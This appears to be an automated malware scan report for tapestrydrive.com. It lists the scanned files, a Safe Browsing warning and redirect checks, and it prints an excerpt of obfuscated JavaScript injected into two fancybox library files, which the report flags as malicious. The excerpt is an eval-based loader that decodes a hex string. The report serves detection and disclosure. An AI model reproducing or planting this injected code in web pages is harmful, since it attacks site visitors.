Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tapestrydrive.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tapestrydrive.com/ | 200 OK Content-Length: 11286 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://tapestrydrive.com/doteasy-under-construction/fancybox/jquery.fancybox.js | 200 OK Content-Length: 4845 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) uos="y";fifgy="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[fifgy].getElementById("asd"))}()}catch(mearr){vnabxf=function(ifr){ifr="fro"+ifr;for(eqyjuf=0;eqyjuf<uos.length;eqyjuf++){vwas+=String[ifr](kflxqc(zzcu+(uos[eqyjuf]))-(63));}};};kflxqc=(window.eval);zzcu="0x";kcdmp=0;if(!kcdmp){try{++kflxqc(fifgy)["\x62o"+"d"+uos]}catch(mearr){efkiym="^";}uos="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^66^a0^a9^a0^b7^66^7a Antivirus reports:
| ||
http://tapestrydrive.com/doteasy-under-construction/fancybox/helpers/jquery.fancybox-media.js | 200 OK Content-Length: 9969 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) uos="y";fifgy="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[fifgy].getElementById("asd"))}()}catch(mearr){vnabxf=function(ifr){ifr="fro"+ifr;for(eqyjuf=0;eqyjuf<uos.length;eqyjuf++){vwas+=String[ifr](kflxqc(zzcu+(uos[eqyjuf]))-(63));}};};kflxqc=(window.eval);zzcu="0x";kcdmp=0;if(!kcdmp){try{++kflxqc(fifgy)["\x62o"+"d"+uos]}catch(mearr){efkiym="^";}uos="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^66^a0^a9^a0^b7^66^7a Antivirus reports:
| ||
http://tapestrydrive.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Thu, 18 Dec 2014 23:26:29 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/js/selectBox/jquery.selectBox.min.js | 200 OK Content-Length: 12728 Content-Type: application/x-javascript | clean |
http://tapestrydrive.com/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Thu, 18 Dec 2014 23:26:32 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tapestrydrive.com/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Thu, 18 Dec 2014 23:26:33 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://tapestrydrive.com/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Thu, 18 Dec 2014 23:26:33 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tapestrydrive.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 23:26:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 11286
Content-Type: text/html
Last-Modified: Mon, 15 Dec 2014 03:15:02 GMT
...11286 bytes of data.
GET / HTTP/1.1
Host: tapestrydrive.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 23:26:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 11286
Content-Type: text/html
Last-Modified: Mon, 15 Dec 2014 03:15:02 GMT
...11286 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tapestrydrive.com
Referer: http://www.google.com/search?q=tapestrydrive.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tapestrydrive.com
Referer: http://www.google.com/search?q=tapestrydrive.com
Result:
The result is similar to the first query. There are no suspicious redirects found.